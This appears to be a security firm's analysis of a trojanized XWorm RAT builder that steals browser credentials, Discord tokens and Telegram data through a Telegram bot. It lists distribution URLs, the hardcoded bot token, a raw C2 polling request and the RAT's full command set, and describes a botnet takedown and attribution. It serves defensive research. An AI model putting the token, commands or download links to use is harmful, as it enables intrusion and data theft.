.png)
Executive Summary
A trojanized version of the XWorm RAT builder has been weaponized and propagated. It is targeted specially towards script kiddies who are new to cybersecurity and directly download and use tools mentioned in various tutorials thus showing that there is no honour among thieves. The malware is spread primarily through a Github repo but also uses other file-sharing services. It has so far compromised over 18,459 devices globally, is capable of exfiltrating sensitive data like browser credentials, Discord tokens, Telegram data, and system information. The malware also features advanced functionality, including virtualization checks, registry modifications, and a wide array of commands enabling full control over infected systems. Top victim countries include Russia, USA, India, Ukraine, and Turkey.
The malware uses Telegram as its command-and-control (C&C) infrastructure, leveraging bot tokens and API calls to issue commands to infected devices and exfiltrate stolen data. Analysis revealed the malware has so far exfiltrated more than 1 GB of browser credentials from multiple devices. Researchers also identified the malware's "kill switch" feature, which was leveraged to disrupt operations on active devices.
Disruption efforts targeted the malware's botnet by exploiting its uninstall command. While effective for active devices, limitations such as offline machines and Telegram's rate-limiting posed challenges. Attribution efforts linked the operation to a threat actor using aliases like "@shinyenigma" and "@milleniumrat" as well as GitHub accounts and a ProtonMail address..
Analysis
The rise of sophisticated Remote Access Trojans (RATs) has amplified cyber threats, with XWorm emerging as a significant example. Recently, a Trojanized XWorm RAT builder has been identified, being propagated by threat actors via multiple channels such as GitHub repositories, file-sharing services, Telegram channels, and forums. This was specifically targeted towards script kiddies who are new to cybersecurity and use tools mentioned in various tutorials. This builder provides attackers with a streamlined tool to deploy and operate a highly capable RAT, which features advanced capabilities like system reconnaissance, data exfiltration, and command execution.
This analysis aims to provide detailed insights into the delivery, functionality, and impact of this Trojanized XWorm RAT builder. By leveraging data exfiltrated via Telegram, we uncovered the infection sources, mapped its command-and-control (C&C) mechanisms, and identified the breadth of its capabilities and the affected devices. Additionally, we conducted disruption activities targeting the botnet infrastructure to mitigate its operations.
Delivery Vector
We utilized telegram API to forward messages exfiltrated using the bot to an account of our control. Based on the messages obtained, we did an OCR on the images that were basically screen captures of the devices infected by the malware. From those we filtered out the URLs and were able to get sources of infection which were as follows:
Filesharing Services
- https://mega.nz/file/wz1C3TYT
- https://www.upload.ee/files/16734195/AsyncClientexe.html
- https://www.upload.ee/files/17050076/binded.exe.html
GIthub Repositories
- https://github.com/LifelsHex/FastCryptor/blob/main/screen
- https://github.com/Intestio/XWorm-RAT/releases/tag/xworm
- https://github.com/FullPenetrationTesting/888-RAT
- https://github.com/inheritedeu/888-RAT
- https://github.com/guessthatname99/XWorm-RAT-V2.1
- https://github.com/kavateforaro/PhantomCrypt
- https://github.com/Cryakl/Ultimate-RAT-Collection/tree/main/ImminentMonitor
- https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/ImminentMonitor
- https://github.com/kiffGhost/Vedani-Crypter/releases/tag/Vedani-Crypter
- https://github.com/brainfucker854/XWorm-RAT-V5.6/pulls
Telegram Channels
Youtube and other Websites
- https://www.youtube.com/watch?v=wYivVXDfx9w
- https://sinister.ly/Thread-Free-cracked-RATs-and-Crypters
Features of the Malware
Virtualization Checks
The malware check for Virtualization on the system by reading registry keys. The keys associated with NdisVirtualBus and VirtualRender are more likely to exist in virtualized environments because they deal with virtual device interfaces for networking and graphics. Thus, if the malware detects that it is being run in a virtual environment, it does not spread the infection further.
Registry Modification
XWorm also modifies various registry entries. When the command “/machine_id*startupadd” is called from the C&C server, the malware adds entries to the Windows Registry to ensure it executes upon system startup. By modifying specific registry keys, the malware can automatically run its payload each time the system boots, thereby maintaining continuous access.
C&C Server
The malware uses telegram as its control and command server. The malware executables are hardcoded with a telegram bot id and bot token which are as follows:
- Telegram Bot ID: bot8077286634
- Telegram Bot Token: AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ
Data Exfiltration
Upon first execution, the malware sends a request to “http://ip-api.com/json/” to check the IP address and location details of the compromised machine. After which it gathers all the saved passwords from the browsers and sends it via the sendDocument endpoint of the telegram API.
Then the malware also forwards the discord tokens it has found via the sendMessage endpoint of telegram API.
Thereafter, the malware exfiltrates the system information of the victim and forwards it to the telegram API via sendMessage.
In some cases, the malware also takes the screenshots of the system once it is infected and also steals the telegram data in case telegram is installed on the device. Finally it sends the device connected message to the telegram chat along with the location (obtained from ip-api.com) and machine id of the device which was compromised.
Now that this data has been exfiltrated, the malware lays dormant waiting for incoming commands from the C&C server. It uses the getUpdates method of telegram API to listen to any incoming commands for the infected machine. The command usually looks like /machine_id*command. If an attacker sends any command in such a format to the telegram bot, the infected machine can pick it from there and execute commands accordingly.
Request
GET /bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-1 HTTP/1.1
Host: api.telegram.org
The malware waiting for commands via telegram API’s getUpdates
Features
The exhaustive list of commands that the infected machines obey are as follows:
- /online - See all your bots
- /machine_id*help - help
- /machine_id*desktop - grab a screenshot
- /machine_id*telegram - grab telegram data
- /machine_id*discord - grab discord data
- /machine_id*whois - get user location
- /machine_id*history - grab browser history
- /machine_id*historyForce - grab more browser history by killing browser processes, use carefully
- /machine_id*browsers - grab browser data
- /machine_id*browsersForce - grab more browser data by killing browser processes, use carefully
- /machine_id*getDesktop - grab useful desktop files (.pdf, .txt etc)
- /machine_id*systeminfo - grab system information
- /machine_id*activewindow - get active window title
- /machine_id*batteryinfo - get battery status
- /machine_id*programlist - get the list of installed software
- /machine_id*uninstall - uninstall RAT from victim`s PC
- /machine_id*message*<message>*<error/warn/exclamination/question> - show messagebox to user, leave second argument empty for the default messagebox type
- /machine_id*speak*<text> - pronounce text to user, will work only if the text is in english
- /machine_id*minimize - minimize all opened windows
- /machine_id*maximize - maximize all the windows back
- /machine_id*openurl*<url> - open given url in the default user browser
- /machine_id*shutdown - turn Off the PC
- /machine_id*restart - restart the PC
- /machine_id*hibernate - enter the hibernating mode
- /machine_id*logoff - user log off
- /machine_id*bsod - invoke the Blue Screen of Death
- /machine_id*sendkeypress<keys> - the victim will "press" given keyboard keys
- /machine_id*displayrotation<0/90/180/270> - Set the angle of display rotation, 0 - normal mode
- /machine_id*encrypt*<Password> - encrypt user files with given password, must be remembered for decryption
- /machine_id*decrypt*<Password> - decrypt user files, all the files will be destroyed if the password is wrong
- /machine_id*copy*<src File/Dir full>*<dist File/Dir full path> - copy a file o directory, e.g. /3453*copy*C:\Users\User\Downloads\1.txt*C:\Users\User\1.txt
- /machine_id*list*<Dir full path> - shows files and folders in a directory, e.g. /3453*list*C:\Users
- /machine_id*size*<File/Dir full path> -get the file/directory size
- /machine_id*delete*<File/Dir full path> - deletes a file or folder
- /machine_id*run*<File full path> - runs a file (e.g. exe, png, txt etc)
- /machine_id*upload*<File/Dir full path> - Grabs a file from victim`s PC, won`t work if the file is too big
- /machine_id*download - victim`s PC downloads a file attached to this message, if it is a picture it should also be attached as a file
- /machine_id*processlist - shows the list of current processes running
- /machine_id*processkill*<process name, e.g. discord, Telegram etc> - kill a process by name, must not add .exe
- /machine_id*processpath*<process name, e.g. discord, Telegram etc> - Show the path to process, must not add .exe
- /machine_id*desktopPath - show the path to desktop
- /machine_id*startuplist - see the list of startup programs
- /machine_id*startupadd - add the RAT to startup
- /machine_id*cmd*<command> - run a cmd command on victim`s PC
- /machine_id*destroy*<Dir full path> - destroy all the possible files/folder in a directory
- /machine_id*gift*<NEW TOKEN>*<NEW CHAT ID>*<message> - gift this bot to another user, his telegram bot has to be started
- /machine_id*keylogger - get user keylogs
- /machine_id*keyloggerClear - clear user keylogs
- /machine_id*about - about
Impact
Using a certain technique we were able to dump the entire data that was exfiltrated via Telegram by the malware. Our findings show that so far the malware has compromised more than 18459 devices. The top 5 countries affected by the trojanized RAT builder are as follows:
- Russia
- USA
- India
- Ukraine
- Turkey
However, out of the 18459+ devices infected, browser credentials have been stolen from only 2068 devices so far. The data exfiltrated by the malware is as follows:
- 4991 .jpg files: Screenshot of compromised devices using /device_id*desktop command.
- 2222 .zip files: Browser data dumped by default after infection.
- 20 .exe: Custom executables dropped on the infected devices by the threat actors on the infected devices via /device_id*download command. These exe files are not present in virustotal as of now.
- 8 .txt: Keylogger files obtained after running /device_id*keylogger
In one instance each pdf and mp3 file was downloaded from the victim just to test if they contained anything sensitive. The volume wise breakdown of the data exfiltrated is as follows:
- 1112.21 MB (around 1 GB) of browser credentials exfiltrated.
- 425.784 MB of .jpg files that are screenshots of infected devices.
Disrupting the Botnet
The infected machines were working like a botnet, listening for commands via the telegram API. During our observation we found that the malware has a feature that acts as a ‘kill switch’ of sorts that can be called from the telegram messages sent to the bot by the threat actors.
The Kill Switch
The malware included a command /uninstall which had been used by the threat actor in the past to remove the malware infection from a machine using its machine ID.
So, there were 3 things required to remove the infection from a device:
- The machine ID assigned by the malware
- Access to the telegram bot to send the message.
- The infected machine should be online and listening to the commands.
Machine IDs we had collected from the chats and the telegram bot username was obtained via the getMe endpoint of telegram API. Combining the two we made two bursts of messages to the bot:
- All the machine IDs present in the messages.
- Brute forcing machine IDs from 1 to 9999.
During that duration, any machine that was actively listening to the messages and had its machine ID matched would automatically remove the malware from it. The screenshot below shows the getUpdates message that the machine would see at the time of our message bursts.
Limitations of the Approach
- Not all infected machines would be online at the time of our message bursts. Hence they would not have gotten the uninstall command and would stay infected.
- Rate limiting is being done by telegram of the messages sent to the bot. Hence some messages might have been lost in transit or even our telegram account gets banned temporarily for sometime.
Attribution/Infrastructure
In the initial few messages dumped from the telegram bot, we saw that there was a .rdp file uploaded to an infected machine by the threat actors. It can be said with moderate confidence that it was being used for testing purposes by the threat actors. The AWS address in the RDP file was “ec2-18-191-85-60.us-east-2.compute.amazonaws.com”.
From the commit messages on the repositories where the threat actor shared the trojanized RAT builder, we obtained the following email address: [email protected]. In the past the same threat actor has used multiple Github accounts such as:
Telegram Channel Username offering the RAT: @milleniumrat
Telegram username of the threat actor: @shinyenigma
Mitigation
1. Detection and Response
- Endpoint Detection and Response (EDR): Deploy advanced EDR solutions to detect and mitigate RAT activity by monitoring unusual system behaviors, such as unauthorized registry modifications, browser data access, or Telegram API usage.
- Network Monitoring: Utilize Intrusion Detection and Prevention Systems (IDPS) to identify and block communication to malicious C&C servers, including Telegram API endpoints.
2. Containment
- Quarantine Infected Systems: Immediately isolate compromised machines from the network to prevent further data exfiltration and lateral movement.
- Disable Malicious Telegram Bots: Report and request the suspension of Telegram bots used for C&C operations.
3. Threat Intelligence and Awareness
- Update Threat Intelligence Feeds: Continuously update intelligence feeds with IOCs (Indicators of Compromise) from the identified malicious repositories, Telegram channels, and file-sharing services.
- Employee Training: Educate employees on recognizing phishing links, malicious downloads, and fake RAT builders to minimize initial infection vectors.
4. Proactive Measures
- Block Known IOCs:some text
- Block access to malicious GitHub repositories, file-sharing links, and Telegram channels at the network perimeter.
- Monitor and Patch Systems: Regularly update software, particularly internet-facing applications, to close vulnerabilities that attackers exploit.
- Enforce Application Whitelisting: Restrict execution of unauthorized programs, such as the Trojanized RAT builder, on endpoint devices.
5. Eradication
- Use Known Kill Switch Commands: Leverage commands such as /uninstall on accessible infected devices to forcefully remove the malware, if possible.
- Comprehensive Threat Removal: After ensuring systems are offline, remove malicious registry keys, clean up startup scripts, and conduct a deep system scan to ensure the RAT is eradicated.
6. Legal and Collaborative Actions
- Engage with Law Enforcement: Collaborate with authorities to trace and prosecute the actors involved, leveraging the attribution details uncovered in the investigation.
- Collaboration with Platform Providers: Partner with platforms like GitHub, Telegram, and file-sharing services to remove malicious content and accounts.
Indicators of Compromise (IoCs)